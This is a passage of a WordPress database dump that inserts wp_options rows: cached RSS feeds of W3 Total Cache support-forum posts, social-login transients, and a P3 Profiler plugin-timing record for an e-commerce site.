Forever!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"enclosure";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"url";s:72:"https://optimizingmattersblog.files.wordpress.com/2016/10/shortpixel.png";s:6:"length";s:4:"7025";s:4:"type";s:9:"image/png";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:217:"<p>[Automatically optimizing your images can boost your site\'s performance considerably. Check out how much ShortPixel can save and get 50% extra monthly optimizations when signing up as Autoptimize user! Forever!</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:2:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";s:4:"href";s:54:"http://feeds.feedburner.com/OptimizingMattersDownloads";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:3:"rel";s:3:"hub";s:4:"href";s:32:"http://pubsubhubbub.appspot.com/";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:4:"info";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:1:{s:3:"uri";s:26:"optimizingmattersdownloads";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:10:{s:12:"content-type";s:34:"application/rss+xml; charset=UTF-8";s:4:"etag";s:27:"2GEdbkI+WP334dZPnnJGVTPpPyA";s:13:"last-modified";s:29:"Wed, 25 Jan 2017 12:22:41 GMT";s:16:"content-encoding";s:4:"gzip";s:4:"date";s:29:"Wed, 25 Jan 2017 14:07:59 GMT";s:7:"expires";s:29:"Wed, 25 Jan 2017 14:07:59 GMT";s:13:"cache-control";s:18:"private, max-age=0";s:22:"x-content-type-options";s:7:"nosniff";s:16:"x-xss-protection";s:13:"1; mode=block";s:6:"server";s:3:"GSE";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (607594, '_transient_timeout_feed_mod_058fd0b28f87f0adb2bc7ab92e7548f4', '1485396479', 'no'); 
INSERT INTO `wp_options` VALUES (607595, '_transient_feed_mod_058fd0b28f87f0adb2bc7ab92e7548f4', '1485353279', 'no'); 
INSERT INTO `wp_options` VALUES (607635, '_site_transient_timeout_n_nextend5888d57a95dff6.58620507', '1485366154', 'no'); 
INSERT INTO `wp_options` VALUES (607636, '_site_transient_n_nextend5888d57a95dff6.58620507', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607637, '_site_transient_timeout_nextend5888d57a95dff6.58620507_fb_state', '1485366154', 'no'); 
INSERT INTO `wp_options` VALUES (607638, '_site_transient_nextend5888d57a95dff6.58620507_fb_state', 'adc8b95f6dfa8f29c357775aa8dc1fa4', 'no'); 
INSERT INTO `wp_options` VALUES (607639, '_site_transient_timeout_nextend5888d57a95dff6.58620507_fb_r', '1485366154', 'no'); 
INSERT INTO `wp_options` VALUES (607640, '_site_transient_nextend5888d57a95dff6.58620507_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607685, '_site_transient_timeout_n_nextend5888fd84083523.70677833', '1485376404', 'no'); 
INSERT INTO `wp_options` VALUES (607686, '_site_transient_n_nextend5888fd84083523.70677833', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607687, '_site_transient_timeout_nextend5888fd84083523.70677833_fb_state', '1485376404', 'no'); 
INSERT INTO `wp_options` VALUES (607688, '_site_transient_nextend5888fd84083523.70677833_fb_state', '33d2629104b07cc87be702a068dd1a20', 'no'); 
INSERT INTO `wp_options` VALUES (607689, '_site_transient_timeout_nextend5888fd84083523.70677833_fb_r', '1485376807', 'no'); 
INSERT INTO `wp_options` VALUES (607690, '_site_transient_nextend5888fd84083523.70677833_fb_r', 'https://www.miller-stephenson.com/my-account/lost-password/?show-reset-form=true', 'no'); 
INSERT INTO `wp_options` VALUES (607726, 'p3-profiler_version', '1.5.0', 'yes'); 
INSERT INTO `wp_options` VALUES (607728, 'p3-profiler_debug_log', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (607729, 'p3-profiler_options', 'a:6:{s:17:"profiling_enabled";b:0;s:20:"disable_opcode_cache";b:1;s:14:"use_current_ip";b:1;s:10:"ip_address";s:0:"";s:12:"cache_buster";b:1;s:5:"debug";b:0;}', 'yes'); 
INSERT INTO `wp_options` VALUES (607730, 'p3_notices', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (607768, 'p3_scan_', '{"url":"\\/wp-admin\\/admin-ajax.php","ip":"24.63.154.108","pid":13738,"date":"2017-01-25T20:04:00+00:00","theme_name":"\\/home\\/notactiveddd\\/public_html\\/ms4\\/wp-content\\/themes\\/flatsome\\/inc\\/init.php","runtime":{"total":2.89000797272,"wordpress":0.196869134903,"theme":0.172138690948,"plugins":1.02837848663,"profile":1.45327663422,"breakdown":{"p3-profiler":0.0057647228241,"all-404-redirect-to-homepage":0.000596523284912,"all-in-one-wp-migration-unlimited-extension":0.000725030899048,"all-in-one-wp-migration":0.0148820877075,"articles":0.000815153121948,"autoptimize":0.00442957878113,"contact-form-7":0.020925283432,"disable-comments":0.000860452651978,"disable-woocommerce-reviews":0.000511884689331,"disclaimer-and-notification-manager-for-authors":0.000419855117798,"displayProduct":0.0117702484131,"instant-gzip-compression":0.00111865997314,"nextend-facebook-connect":0.00205779075623,"nextend-google-connect":0.00236487388611,"ninja-forms":0.0814807415009,"optimus":0.00268125534058,"password-strength-for-woocommerce":0.000172138214111,"pc-google-analytics":0.00259399414062,"product-enquiry-pro":0.181804180145,"regenerate-thumbnails":0.000608921051025,"reveal-ids-for-wp-admin-25":0.00199270248413,"search-and-replace":0.00936436653137,"show-hide-author":0.00108814239502,"sidecar-decision-tree":0.00207662582397,"smtp-mailer":0.00236344337463,"social-media-widget":0.00130438804626,"ultimate-social-media-plus":0.0114440917969,"user-specific-content":0.00408148765564,"w3-total-cache":0.213252305984,"woocommerce-category-banner":0.000260829925537,"woocommerce-csvimport":0.0481221675873,"woocommerce":0.121606111526,"woosidebars":0.00459551811218,"wordpress-move":0.00731348991394,"wordpress-seo-premium":0.204309225082,"wp-instagram-widget":0.00034499168396,"wp-term-images":0.0181691646576,"wp_migration-master":0.00247478485107,"yith-woocommerce-ajax-search":0.00322604179382,"yith-woocommerce-tab-manager-premium":0.0095522403717,"yith-woocommerce-wishlist":0.0248529911041}},"memory":110886912,"stacksize":59595,"queries":56}\n', 'yes'); 
INSERT INTO `wp_options` VALUES (607769, '_transient_timeout_w3tc_license_status', '1485806688', 'no'); 
INSERT INTO `wp_options` VALUES (607770, '_transient_w3tc_license_status', 'no_key', 'no'); 
INSERT INTO `wp_options` VALUES (607771, '_transient_timeout_w3tc_nr_widgetdata_basic', '1485374751', 'no'); 
INSERT INTO `wp_options` VALUES (607772, '_transient_w3tc_nr_widgetdata_basic', '{"time":1485374690,"php_agent":"<span class=\\"w3tc-disabled\\">disabled<\\/span>"}', 'no'); 
INSERT INTO `wp_options` VALUES (607773, '_transient_timeout_feed_6c78d00722dae650afc8789333d5c38e', '1485417891', 'no'); 
INSERT INTO `wp_options` VALUES (607774, '_transient_feed_6c78d00722dae650afc8789333d5c38e', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:0:"";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:14:"W3 Total Cache";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:75:"http://pipes.yahoo.com/pipes/pipe.info?_id=02f556aa2f503be89aa9d89723644f40";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:59:"The fastest and most complete WordPress performance plugin.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:2:"en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:29:"http://pipes.yahoo.com/pipes/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:5:{i:0;a:6:{s:4:"data";s:0:"";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:78:"medhaniehabte1 on &quot;Opting out of Object Caching for certain objects&quot;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:107:"http://feedproxy.google.com/~r/W3TOTALCACHE/~3/3ls41y0DNZI/opting-out-of-object-caching-for-certain-objects";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:29:"Thu, 01 Oct 2015 09:59:10 PDT";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:37:"7494075@http://wordpress.org/support/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:873:"<p>Greetings, </p>\n<p>I am trying to determine a way in which the cache automatically clears when a page or specific object/plugin/application is updated in our Wordpress page. I ask because whenever, I update certain content, the changes do not appear, even when clearing browser cache. It is then that I have to empty the caches within W3TC. </p>\n<p>Is it possible to have the cache empty automatically whenever any object/page/data is updated? If not, then what steps can I take to assure that whenever a change is made, it automatically appears. For some pages, its fine, but for others not as much.</p>\n<p>Hope it helps.</p>\n<p><a rel="nofollow" target="_blank" href="https://wordpress.org/plugins/w3-total-cache/">https://wordpress.org/plugins/w3-total-cache/</a>\n</p><img src="http://feeds.feedburner.com/~r/W3TOTALCACHE/~4/3ls41y0DNZI" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:97:"https://wordpress.org/support/topic/opting-out-of-object-caching-for-certain-objects#post-7494075";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:0:"";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:89:"Homika on &quot;Recently an error occurred while creating the CSS / JS minify cache&quot;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:127:"http://feedproxy.google.com/~r/W3TOTALCACHE/~3/u3ifsCU0gyU/recently-an-error-occurred-while-creating-the-css-js-minify-cache-10";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:29:"Wed, 30 Sep 2015 09:00:12 PDT";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:37:"7489392@http://wordpress.org/support/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:731:"<p>I have exactly the same problem. "admin-bar-button" plugin was disabled and then deleted but I still get the following error: </p>\n<p>"Recently an error occurred while creating the CSS / JS minify cache: File "/home/enjoyyourcooking.com/wp-content/plugins/admin-bar-button/adminBar-front.css" doesn\'t exist."</p>\n<p><a rel="nofollow" target="_blank" href="http://s14.postimg.org/743dgj31t/Screen_Shot_2015_09_30_at_11_56_06_AM.png">Screenshot</a></p>\n<p>Tried flashing cache, playing with settings of W3 Total Cache. This file is not mentioned in any W3 Total Cache settings. Nothing helps. How can I get rid off this error?\n</p><img src="http://feeds.feedburner.com/~r/W3TOTALCACHE/~4/u3ifsCU0gyU" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:117:"https://wordpress.org/support/topic/recently-an-error-occurred-while-creating-the-css-js-minify-cache-10#post-7489392";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:0:"";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:87:"Norbertjmx on &quot;How to configure W3 Total Cache and Cloudflare in a right way&quot;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:120:"http://feedproxy.google.com/~r/W3TOTALCACHE/~3/N1_dmRDg5sg/how-to-configure-w3-total-cache-and-cloudflare-in-a-right-way";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:29:"Wed, 30 Sep 2015 02:07:53 PDT";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:37:"7487666@http://wordpress.org/support/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:852:"<p>Hey Rakesh,</p>\n<p>Have you checked out these tutorials on cloudflare? They might help you.</p>\n<p><a rel="nofollow" target="_blank" href="https://support.cloudflare.com/hc/en-us/articles/200169756-Can-I-use-WordPress-caching-plugins-like-Super-Cache-or-W3-Total-Cache-W3TC-with-CloudFlare-">https://support.cloudflare.com/hc/en-us/articles/200169756-Can-I-use-WordPress-caching-plugins-like-Super-Cache-or-W3-Total-Cache-W3TC-with-CloudFlare-</a></p>\n<p><a rel="nofollow" target="_blank" href="https://support.cloudflare.com/hc/en-us/articles/200169546-What-fields-do-I-need-to-enter-in-W3TC-W3-Total-Cache-settings-">https://support.cloudflare.com/hc/en-us/articles/200169546-What-fields-do-I-need-to-enter-in-W3TC-W3-Total-Cache-settings-</a>\n</p><img src="http://feeds.feedburner.com/~r/W3TOTALCACHE/~4/N1_dmRDg5sg" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:110:"https://wordpress.org/support/topic/how-to-configure-w3-total-cache-and-cloudflare-in-a-right-way#post-7487666";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:0:"";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:68:"mani04 on &quot;Internal Server Error, no access to most pages&quot;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:105:"http://feedproxy.google.com/~r/W3TOTALCACHE/~3/NR8NCo1KAr0/internatl-server-error-no-access-to-most-pages";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:29:"Tue, 29 Sep 2015 01:13:54 PDT";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:37:"7482801@http://wordpress.org/support/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:388:"<p>My hosting provider checked the server again and found a problem. The permissions for the root directory were set wrong. Now my homepage works, but it displays no content. Also /wp-admin still doesn\'t work (internal server error).</p>\n<p>I\'m waiting for their reply to check again.\n</p><img src="http://feeds.feedburner.com/~r/W3TOTALCACHE/~4/NR8NCo1KAr0" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:95:"https://wordpress.org/support/topic/internatl-server-error-no-access-to-most-pages#post-7482801";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:0:"";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:92:"rakesh.mekaguda on &quot;How to configure W3 Total Cache and Cloudflare in a right way&quot;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:120:"http://feedproxy.google.com/~r/W3TOTALCACHE/~3/6b1YEF7T6Rc/how-to-configure-w3-total-cache-and-cloudflare-in-a-right-way";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:29:"Mon, 28 Sep 2015 12:15:00 PDT";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:37:"7480816@http://wordpress.org/support/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:310:"<p>I found that using W3 Total Cache and Cloudfalre makes my website to load fast, tried the both but not seen any improvement. anyone suggest detailed  tutorial to configure W3 Total Cache with Cloudflare.\n</p><img src="http://feeds.feedburner.com/~r/W3TOTALCACHE/~4/6b1YEF7T6Rc" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:110:"https://wordpress.org/support/topic/how-to-configure-w3-total-cache-and-cloudflare-in-a-right-way#post-7480816";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:4:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";s:4:"href";s:40:"http://feeds.feedburner.com/W3TOTALCACHE";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:3:"rel";s:4:"next";s:4:"href";s:93:"http://pipes.yahoo.com/pipes/pipe.run?_id=02f556aa2f503be89aa9d89723644f40&_render=rss&page=2";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";s:4:"href";s:40:"http://feeds.feedburner.com/W3TOTALCACHE";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:3:"rel";s:3:"hub";s:4:"href";s:32:"http://pubsubhubbub.appspot.com/";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:4:"info";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:1:{s:3:"uri";s:12:"w3totalcache";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:28:"http://www.w3.org/1999/xhtml";a:1:{s:4:"meta";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:4:"name";s:6:"robots";s:7:"content";s:7:"noindex";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:22:"http://pipes.yahoo.com";a:1:{s:4:"meta";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:4:"name";s:5:"pipes";s:7:"content";s:9:"noprocess";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:10:{s:12:"content-type";s:23:"text/xml; charset=UTF-8";s:4:"etag";s:27:"vkh1WP7+2jqt+K0ZhnXRO+nHiXY";s:13:"last-modified";s:29:"Wed, 25 Jan 2017 19:54:50 GMT";s:16:"content-encoding";s:4:"gzip";s:4:"date";s:29:"Wed, 25 Jan 2017 20:04:51 GMT";s:7:"expires";s:29:"Wed, 25 Jan 2017 20:04:51 GMT";s:13:"cache-control";s:18:"private, max-age=0";s:22:"x-content-type-options";s:7:"nosniff";s:16:"x-xss-protection";s:13:"1; mode=block";s:6:"server";s:3:"GSE";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (607775, '_transient_timeout_feed_mod_6c78d00722dae650afc8789333d5c38e', '1485417891', 'no'); 
INSERT INTO `wp_options` VALUES (607776, '_transient_feed_mod_6c78d00722dae650afc8789333d5c38e', '1485374691', 'no'); 
INSERT INTO `wp_options` VALUES (607777, '_transient_timeout_dash_91cf481bdcff97d36bc4763744848eba', '1485417891', 'no'); 
INSERT INTO `wp_options` VALUES (607778, '_transient_dash_91cf481bdcff97d36bc4763744848eba', '<h4>\n	<a href="http://feedproxy.google.com/~r/W3TOTALCACHE/~3/3ls41y0DNZI/opting-out-of-object-caching-for-certain-objects">medhaniehabte1 on &quot;Opting out of Object Caching for certain objects&quot;</a>\n</h4>\n<h4>\n	<a href="http://feedproxy.google.com/~r/W3TOTALCACHE/~3/u3ifsCU0gyU/recently-an-error-occurred-while-creating-the-css-js-minify-cache-10">Homika on &quot;Recently an error occurred while creating the CSS / JS minify cache&quot;</a>\n</h4>\n<h4>\n	<a href="http://feedproxy.google.com/~r/W3TOTALCACHE/~3/N1_dmRDg5sg/how-to-configure-w3-total-cache-and-cloudflare-in-a-right-way">Norbertjmx on &quot;How to configure W3 Total Cache and Cloudflare in a right way&quot;</a>\n</h4>\n\n<p style="text-align: center;">\n	<a href="http://feeds.feedburner.com/W3TOTALCACHE" target="_blank">View Feed</a>\n</p>\n', 'no'); 
INSERT INTO `wp_options` VALUES (607779, '_transient_timeout_dash_54e0612bb2ce53db0827d5e7c3c1b7dc', '1485417891', 'no'); 
INSERT INTO `wp_options` VALUES (607780, '_transient_dash_54e0612bb2ce53db0827d5e7c3c1b7dc', '\n<p style="text-align: center;">\n	<a href="http://feeds.feedburner.com/W3EDGE" target="_blank">View Feed</a>\n</p>\n', 'no'); 
INSERT INTO `wp_options` VALUES (607790, 'wpsupercache_gc_time', '1503416816', 'yes'); 
INSERT INTO `wp_options` VALUES (607791, 'wp_super_cache_index_detected', '3', 'no'); 
INSERT INTO `wp_options` VALUES (607792, '_site_transient_timeout_n_nextend588908f7690ab2.79036218', '1485379335', 'no'); 
INSERT INTO `wp_options` VALUES (607793, '_site_transient_n_nextend588908f7690ab2.79036218', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607794, '_site_transient_timeout_nextend588908f7690ab2.79036218_google_r', '1485379335', 'no'); 
INSERT INTO `wp_options` VALUES (607795, '_site_transient_nextend588908f7690ab2.79036218_google_r', '', 'no'); 
